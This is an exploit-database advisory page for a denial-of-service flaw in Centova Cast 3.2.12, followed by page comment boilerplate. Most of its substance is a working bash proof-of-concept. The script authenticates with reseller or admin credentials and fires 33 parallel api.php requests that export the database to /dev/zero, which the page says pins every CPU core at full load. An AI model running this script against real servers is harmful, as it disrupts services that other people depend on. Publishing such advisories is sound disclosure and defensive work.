Centova Cast 3.2.12 Denial Of Service

2019.11.20

Credit: DroidU

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC)
# Date: 2019-11-18
# Exploit Author: DroidU
# Vendor Homepage: https://centova.com
# Affected Version: <=v3.2.12
# Tested on: Debian 9, CentOS 7
# ===============================================
# The Centova Cast becomes out of control and causes 100% CPU load on all cores.
#!/bin/bash
if [ "$3" = "" ]
then
echo "Usage: $0 centovacast_url reseller/admin password"
exit
fi
url=$1
reseller=$2
pass=$3
dwn() {
echo -n .
curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" &
}
for i in {0..32}
do
dwn /dev/zero
sleep .1
done
echo "
Done!"

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Centova Cast 3.2.12 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.